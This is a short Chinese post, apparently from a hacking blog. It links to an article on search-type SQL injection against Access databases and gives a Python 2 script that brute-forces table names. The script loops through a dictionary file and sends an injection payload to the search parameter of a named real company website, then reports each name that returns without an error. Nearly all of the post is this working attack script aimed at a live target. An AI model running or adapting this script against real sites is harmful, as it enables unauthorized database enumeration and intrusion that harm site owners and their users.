access的搜索型注入看这个:
http://www.hack6.com/wzle/gf/2010/sousuoxingzhuruASP_ACCESS_82168216.html
写个python 来猜表名:
# -*- coding: utf-8 -*-
import urllib2
import urllib
file=open("dic.txt","r") #加载字典
for fd in file.readlines():
dicstr=str(fd[:-1])
url="http://www.hztaidu.com/NewsSearch.aspx?k="
para="'and(select count(*)from %s)>0 and '%%'='" % dicstr
finpara=urllib.quote(para)
finurl= url+finpara
try:
a=urllib2.urlopen(finurl).read()
print "表名是:"+dicstr
except urllib2.HTTPError,e:
pass
file.close()